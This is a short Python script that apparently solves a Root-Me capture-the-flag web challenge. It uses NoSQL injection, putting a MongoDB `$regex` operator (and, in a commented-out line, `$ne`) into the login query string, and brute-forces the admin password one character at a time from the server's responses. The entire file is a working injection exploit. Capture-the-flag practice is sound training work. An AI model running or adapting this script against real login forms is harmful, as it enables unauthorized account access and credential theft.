#!/usr/python3                                                                                                                                                                                                                                                                  
                                                                                                                                                                                                                                                                                
import requests                                                                                                                                                                                                                                                                 
#33 => 126                                                                                                                                                                                                                                                                      
password = ""                                                                                                                                                                                                                                                                   
len = 12                                                                                                                                                                                                                                                                        
url = "http://challenge01.root-me.org/web-serveur/ch38/?login=admin&pass[$regex]="                                                                                                                                                                                              
#url = "http://challenge01.root-me.org/web-serveur/ch38/?login[$ne]=[%22admin%22,%22test%22]&pass[$regex]="                                                                                                                                                                     
#a.{12}                                                                                                                                                                                                                                                                         
                                                                                                                                                                                                                                                                                
while (len > 0):                                                                                                                                                                                                                                                                
    for i in range(33, 126):                                                                                                                                                                                                                                                    
        # if i==41:                                                                                                                                                                                                                                                             
        #     i=44                                                                                                                                                                                                                                                              
        #     # le . qui nous embète aussi"""                                                                                                                                                                                                                                   
        # if i==45:                                                                                                                                                                                                                                                             
        #     i=46                                                                                                                                                                                                                                                              
        # # : ; < = > ?                                                                                                                                                                                                                                                         
        # if i==57:                                                                                                                                                                                                                                                             
        #     i=64                                                                                                                                                                                                                                                              
        # # \                                                                                                                                                                                                                                                                   
        # if i==91:                                                                                                                                                                                                                                                             
        #     i=92                                                                                                                                                                                                                                                              
        # # ^                                                                                                                                                                                                                                                                   
        # if i==93:                                                                                                                                                                                                                                                             
        #     i=94                                                                                                                                                                                                                                                              
        # # et le pipe |                                                                                                                                                                                                                                                        
        # if i==123:                                                                                                                                                                                                                                                            
        #     i=124                                                                                                                                                                                                                                                             
        tmp_pass = password + chr(i)                                                                                                                                                                                                                                            
        full_url = "{}{}.{}".format(url, tmp_pass, '{' + str(len) + '}')                                                                                                                                                                                                        
        r = requests.get(full_url)                                                                                                                                                                                                                                              
        print("trying {}: \"flag\" in response:{}".format(chr(i), "flag" in r.text))                                                                                                                                                                                            
        print(full_url)                                                                                                                                                                                                                                                         
        if (r.status_code == 200 and "no_secret" in r.text):                                                                                                                                                                                                                    
            password += chr(i)                                                                                                                                                                                                                                                  
            len -= 1                                                                                                                                                                                                                                                            
            print(full_url)                                                                                                                                                                                                                                                     
            print("=> current password is {} + {}".format(tmp_pass, len))                                                                                                                                                                                                       
            # print(r.text)                                                                                                                                                                                                                                                     
                                                                                                                                                                                                                                                                                
print("found password {}".format(password))                                                                                                                                                                                                                                     
                                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                                
                                                       
